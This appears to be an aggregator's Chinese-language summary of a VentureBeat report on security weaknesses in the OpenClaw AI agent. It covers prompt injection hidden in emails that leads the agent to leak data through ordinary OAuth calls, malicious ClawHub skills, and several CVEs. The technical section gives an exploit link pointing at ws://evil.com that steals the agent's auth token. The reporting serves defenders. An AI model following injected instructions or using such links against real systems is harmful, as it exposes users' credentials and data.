💼較早收集於 4h

OpenClaw 可無警報繞過 EDR、DLP 和 IAM

OpenClaw 可無警報繞過 EDR、DLP 和 IAM
PostLinkedIn
💼閱讀原文: VentureBeat
#agent-security#prompt-injection#credential-leakageopenclawopenclawtoken-securitybitsightsnyk

💡OpenClaw 規避 EDR/DLP/IAM—3 攻擊面威脅代理安全

⚡ 30-Second TL;DR

有什麼變化

在電子郵件中嵌入惡意指令,透過正常 OAuth API 進行語意滲出

為什麼重要

企業面臨 AI 代理執行「正常」動作的隱秘資料外洩風險,動搖代理工作流程信任。社群快速修補存在,但對核心語意攻擊無效,需要新防禦範式。

下一步行動

使用 Bitsight 審計暴露的 OpenClaw 實例,並實施惡意技能偵測。

誰應關注:Enterprise & Security Teams

關鍵要點

  • 在電子郵件中嵌入惡意指令,透過正常 OAuth API 進行語意滲出
  • Token Security 客戶 22% 未經授權運行 OpenClaw;逾 30k 暴露實例
  • 三攻擊面:運行時語意滲出、跨代理上下文洩漏、不信任內容暴露
  • Snyk 審計顯示 36% ClawHub 技能有安全漏洞

🧠 深度解析

背景與延伸:來自公開資料,非原文內容。引用 10 個來源。

🔑 增強重點摘要

  • OpenClaw 的 CVE-2026-25253 漏洞(CVSS 8.8)允許未經身份驗證的遠端攻擊者透過 WebSocket 劫持在一次點擊內竊取身份驗證令牌,無需任何外掛或使用者互動[1][2]
  • ClawHub 技能市場存在嚴重的供應鏈污染問題:Koi Security 審計發現 2,857 個技能中有 341 個明確惡意,Bitdefender 獨立掃描發現約 900 個惡意技能(約 20%),單一帳戶「hightower6eu」上傳了 354 個惡意套件[2]
  • CVE-2026-29612 拒絕服務漏洞影響 2026.2.14 之前的版本,允許遠端攻擊者透過 base64 媒體解碼功能中的資源分配缺陷發送超大 base64 負載,導致記憶體耗盡和服務中斷[4]
  • OpenClaw 存在多個關鍵配置風險:在未啟用身份驗證的情況下運行閘道(尤其是在配置錯誤的反向代理後面)、未更新過關鍵 RCE 漏洞,以及安裝未經審查的 ClawHub 技能是前三大風險[2]

🛠️ 技術深入

  • CVE-2026-25253 利用鏈:攻擊者製作惡意連結(如 http:///chat?gatewayUrl=ws://evil.com),受害者點擊後 applySettingsFromUrl() 函數儲存攻擊者控制的 gatewayUrl,OpenClaw 啟動 WebSocket 連線並在連線框架中發送身份驗證令牌、裝置 ID 和公鑰,攻擊者捕獲令牌後可重新連線至合法閘道並實現遠端程式碼執行[1]
  • CVE-2026-29612 技術細節:漏洞分類為 CWE-770(無限制或無節流的資源分配),核心問題在於媒體檔案處理期間安全檢查順序不當。OpenClaw 在驗證解碼後的緩衝區大小是否在可接受限制內之前執行完整的 base64 解碼操作,允許攻擊者供應超大 base64 負載觸發大型記憶體分配[4]
  • CVE-2026-24763 命令注入漏洞:存在於 OpenClaw 的 Docker 沙箱執行機制中,由於在構造 shell 命令時不安全地處理 PATH 環境變數,已驗證的使用者若能控制環境變數可影響容器內的命令執行[8]
  • 安全修補時間線:CVE-2026-25253 在 2026 年 1 月底披露後於 2026.1.29 版本修補;ClawJacked 漏洞由 Oasis Security 發現後在 24 小時內於 2026.2.25 版本修補;CVE-2026-29612 在 2026.2.14 版本中修復[2][7]

🔮 前景展望AI analysis grounded in cited sources

OpenClaw 的本地執行模型使其成為供應鏈攻擊的高價值目標
由於 OpenClaw 具有完整系統存取權限(包括檔案操作和 shell 命令執行),ClawHub 中 20% 的惡意技能和未驗證的部署(30,000+ 暴露實例)將使大規模妥協成為可能。
未啟用身份驗證的閘道配置將成為企業環境中的主要入侵向量
Token Security 報告顯示 22% 的客戶未經授權運行 OpenClaw,結合反向代理配置錯誤,這將使遠端攻擊者能夠繞過 EDR/DLP 警報並進行無聲資料竊取。

時間線

2026-01
DepthFirst 研究人員披露 CVE-2026-25253 WebSocket 劫持漏洞(CVSS 8.8),允許一次點擊遠端程式碼執行
2026-01-29
OpenClaw 發佈版本 2026.1.29,修補 CVE-2026-25253 和 CVE-2026-24763 命令注入漏洞
2026-02
Koi Security 審計 ClawHub 發現 341 個明確惡意技能;Bitdefender 獨立掃描發現約 900 個惡意技能(約 20%)
2026-02-25
Oasis Security 發現 ClawJacked 漏洞,允許任何網站無聲接管開發者的 AI 代理;OpenClaw 在 24 小時內發佈 2026.2.25 版本修補
2026-02-14
OpenClaw 發佈版本 2026.2.14,修補 CVE-2026-29612 base64 媒體解碼拒絕服務漏洞
2026-03-10
Trend Micro 發佈《CISOs in a Pinch: A Security Analysis of OpenClaw》報告,分析 OpenClaw 作為企業主權代理的安全性
📰

AI 週報

閱讀本週精選 AI 大事摘要 →

👉相關動態

AI 策展新聞聚合。所有內容版權歸原始發布者所有。
原始來源: VentureBeat

這是摘要,不是原文。去看原站,或訂閱每週簡報。

每週 AI 簡報

每週一封,可隨時退訂。